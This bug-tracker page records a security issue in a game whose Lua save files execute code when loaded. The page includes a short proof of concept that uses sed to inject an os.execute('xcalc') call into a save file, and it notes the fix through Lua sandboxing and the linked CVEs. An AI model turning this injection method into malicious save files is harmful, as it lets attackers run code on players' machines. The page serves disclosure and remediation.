Issue953

Issues
Show Not Resolved
Show All
Search

Login




Register
Lost your login?

Help
Roundup docs

Title Lua code execution in loading untrusted save game
Priority release-blocker Status resolved
Assigned To fluzz Keywords
Linked issues CVE-2020-14938: An issue was discovered in map.c, CVE-2020-14939: An issue was discovered in savestruct_internal.c
View: 968, 967 		Watchers fluzz

Submitted on 2019-07-25 14h00 by mmmds, last changed by fluzz.

Messages
Author: mmmds Date: 2019-07-25   14h00 
Save games files consist of Lua script to execute during load. Assuming that users may 
load malicious save games, for example downloaded or received from other users, 
arbitrary code may be executed on their machines.


savestruct_internal.c, void load_game_data(char *strin)

PoC:
CH="mmm"
gunzip $CH.sav.gz
sed -i -e '0,/^$/s/^$/os.execute("xcalc")/' $CH.sav
gzip $CH.sav

Loading the save will run xcalc.
Author: fluzz Date: 2020-06-29   13h52 
see issue967
Author: fluzz Date: 2022-12-25   16h56 
Fixed in commit e106cec2c
Lua sandboxing added
History
Date User Action Args
2022-12-25 16:56:59fluzzsetstatus: open -> resolved
messages: + msg3774
2021-11-13 22:33:14fluzzlinkissue968 linked
2021-11-13 22:32:53fluzzsetlinked: + CVE-2020-14938: An issue was discovered in map.c
2021-11-13 16:49:55fluzzlinkissue967 linked
2021-11-13 16:49:52fluzzsetlinked: + CVE-2020-14939: An issue was discovered in savestruct_internal.c
2021-11-05 13:19:17fluzzsetassignedto: fluzz
nosy: + fluzz
2021-11-05 10:53:20fluzzsetpriority: bug -> release-blocker
2020-06-29 13:52:32fluzzsetmessages: + msg3696
2019-07-25 14:00:46mmmdscreate